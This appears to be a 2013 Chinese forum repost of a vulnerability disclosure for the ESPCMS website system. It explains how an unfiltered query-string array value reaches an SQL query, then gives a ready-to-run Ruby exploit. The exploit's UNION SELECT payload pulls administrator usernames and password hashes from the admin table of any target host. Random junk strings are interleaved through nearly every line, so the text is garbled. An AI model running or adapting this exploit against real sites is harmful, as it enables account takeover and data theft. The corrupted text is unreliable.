0×0 漏洞概述0×1 漏洞细节
2 E. B) w, k2 K4 B7 E0×2 PoC8 [7 I3 o B* R" \! o
1 r d3 F6 ^5 }+ h1 G! k
3 Q a9 A0 o( K0 Q4 m; `, r# @" b+ M
0×0 漏洞概述3 R/ s# I* O( K V% w
: s1 h( e4 o8 \1 J, d易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
" R1 { A6 [; w" C( c5 }7 N其在处理传入的参数时考虑不严谨导致SQL注入发生
- @+ Z. c0 [6 Y
. F& p, D. y. G! K! I. @2 N
% s% u- N6 _0 X Z2 b& `0×1 漏洞细节
' q" v* z- x9 `/ Q; p! u( b9 t. Q! E
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。5 x5 ?% V/ @% J- I D n
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
+ @' I" n+ N2 |4 k4 t而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。+ C9 O( O3 w9 [# j: }( n
( y+ A( B" w+ a
在/interface/3gwap_search.php文件的in_result函数中:
7 a6 h+ a' p+ ]7 j% k2 [) O7 A$ Z6 X/ q# H5 r6 B: ~
; y6 X' E; Z* ~5 g. L& W/ J/ d1 i, m) G; i/ K
function in_result() {: B3 O$ C# o0 M# O
... ... ... ... ... ... ... ... ...
! b. r! \# ]5 I! C" ? $urlcode = $_SERVER[ 'QUERY_STRING '];! P* v7 g+ Q0 B0 U3 K6 @/ j( [
parse_str(html_entity_decode($urlcode), $output);
: O! Q% ]2 g% Q; u1 ?9 f, j- h3 c, ?* K2 _- S
... ... ... ... ... ... ... ... ...2 C: e. w- Y% X
if (is_array($output['attr' ]) && count($output['attr']) > 0) {% S8 z; ?% {8 j. {( G
( |- z2 _2 `- z* V+ m" P. I $db_table = db_prefix . 'model_att';, |: \, N4 m' ^3 }/ ~
( q! ^6 _- N2 {
foreach ($output['attr' ] as $key => $value) {1 M( C9 R/ @5 @
if ($value) {( B& p, P0 _3 P* Z
3 { ]4 S/ e0 }
$key = addslashes($key);
5 \& t% I, P: b# A" r B4 W $key = $this-> fun->inputcodetrim($key);7 p/ q9 Z& S g s
$db_att_where = " WHERE isclass=1 AND attrname='$key'";2 n5 l* c1 L* D* r
$countnum = $this->db_numrows($db_table, $db_att_where);
, ~0 F; c, u0 D* ? if ($countnum > 0) {
' e. g* M, C! K h0 ^ $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
+ |( }; q1 Y* U0 j; r) { }
+ W: U% `: A, N; U9 b6 {) n }+ U8 L# z7 s2 F1 @- }
}
( N6 |& }% x- P7 h }6 Q' c( F4 ^4 T6 O8 {: i
if (!empty ($keyword) && empty($keyname)) {& E; L. n1 ]5 S% g( ]* i
$keyname = 'title';
& J8 S6 F/ o1 J* b) [/ e $db_where.= " AND a.title like '%$keyword%'" ; l$ {" |& k+ Z* F) ~# J
} elseif (!empty ($keyword) && !empty($keyname)) {$ N7 B X) Z0 r A& ?
$db_where.= " AND $keyname like '% $keyword%'";* p0 Y2 n# b! `$ P# j+ a/ |
}
- a; v/ d7 ~; T7 `) Y $pagemax = 15;' t4 A h! U6 y+ t2 }# {2 f& ]
2 M0 N) k9 |8 ~, G0 w: j
$pagesylte = 1;
9 _; Z) H- L$ _4 X' ]$ p4 q2 ?+ \! w8 ]: m2 @1 i7 C) N
if ($countnum > 0) {# c* X/ u# k% ~: Z+ Z; \
! M0 T# R; y9 t' }9 ]* g' v
$numpage = ceil($countnum / $pagemax);
* p% r' y% s; j$ c, {( i& ?, @4 L# R } else {
' X0 Z# M' e0 k; w $numpage = 1;3 a6 ?1 a' r5 y2 O! S- q3 h
}+ E# n/ Q$ X3 j. x! S4 w
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;+ I2 T! d9 O" ^
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);3 v: ]8 T8 X% o0 ?& t
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);# P( b+ ] `7 k0 X$ Z/ J! x; v" R- y
... ... ... ... ... ... ... ... ...8 `, \5 @! F% K7 _
}
" q3 R* H: m" \$ m/ n, E( l7 \
, Y3 O" ^# m1 C8 h9 i* U8 V: o2 P0 E w& b. L( b
0×2 PoC
8 ~! r; }' t$ B- Z9 R: r
5 {, W0 N- @; S* i# V8 F. H6 n
$ u1 j. W5 |% Q' d+ y, } S* F, {; B- {6 [' W7 @
require "net/http"" i% x1 Y' J( `
. _( x! k9 N: T3 }: ^( \4 V1 U+ Q9 ?# D
def request(method, url); n/ [7 z" w# ~ Q, W1 j
if method.eql?("get")6 Z: X3 ]8 u9 F v, L7 U
uri = URI.parse(url)
6 J% F3 \7 Y7 t7 M http = Net::HTTP.new(uri.host, uri.port)
& ^9 C6 d3 m7 Y: l response = http.request(Net::HTTP::Get.new(uri.request_uri))
- V* V. b4 b- c3 J- j; F3 \5 g return response) H+ J9 _/ j! s) D
end
2 [' N! Z8 d2 T8 X2 p; D& G7 W1 s6 Gend: M# p: d: i( E+ G5 o
d$ O% U6 i+ `, A" E5 ?$ d9 cdoc =<<HERE' c# ?5 s* e' |& z+ l
-------------------------------------------------------
- N4 X1 D1 T+ `Espcms Injection Exploit8 X3 q5 l7 `! d6 J, x: q
Author:ztz! ?; x) N2 ~" _9 }
Blog:http://ztz.fuzzexp.org/' h2 R) i7 ^& x/ |- R' [7 J: m, r' C& o0 y
-------------------------------------------------------" N& n5 Y) d1 A; L n3 `' Y
, M9 e7 D$ q' q( B* j4 R( \HERE
) |' I" e1 q1 w& p% X( T9 |' u; P3 E0 K, }. P- h( v' w! E
usage =<<HERE
, [* {1 T- {2 p f0 u. \Usage: ruby #{$0} host port path$ p0 ]- M7 @/ s3 U- \% X
example: ruby #{$0} www.target.com 80 /
/ y" {% L3 ?+ F6 j4 JHERE
! p; M8 Y5 m( Y% b. ?
& B6 h H& u' S+ m% lputs doc1 \7 a* g1 X& i1 ^: I
if ARGV.length < 30 }6 y. U- K- A: ?
puts usage
- ^* a- V) _5 T( {else) W z- k2 ?: V
$host = ARGV[0]
3 {: ~' `( U5 {% E A9 i; } $port = ARGV[1]: K5 M! Y4 E$ M' g
$path = ARGV[2]
( t4 t" [1 D6 k" m: f6 I/ k q' ~( W$ h5 h$ h& N1 O* w) _! n
puts "send request..."5 v) \2 B, @4 ~: e, {: h
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
0 _0 Z) V+ K& R; ~( h. ?attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13: r, E2 P+ r) C5 d
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
5 o+ E+ b) v' X5 S5 F+ V,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23", e! l+ _9 z: g( F
response = request("get", url)
- c" V3 @6 @; p! F6 D/ B; k& n) r result = response.body.scan(/\w+&\w{32}/)
) T. H0 p$ ]0 y9 Y1 J; M' y" w puts result4 @' b+ [. {' H* ]/ K
end
# q" T8 N j. C
% D( Z3 W# G* J6 u V7 V! E9 C6 K |
发表于 2013-7-27 18:31:52
收藏
支持
反对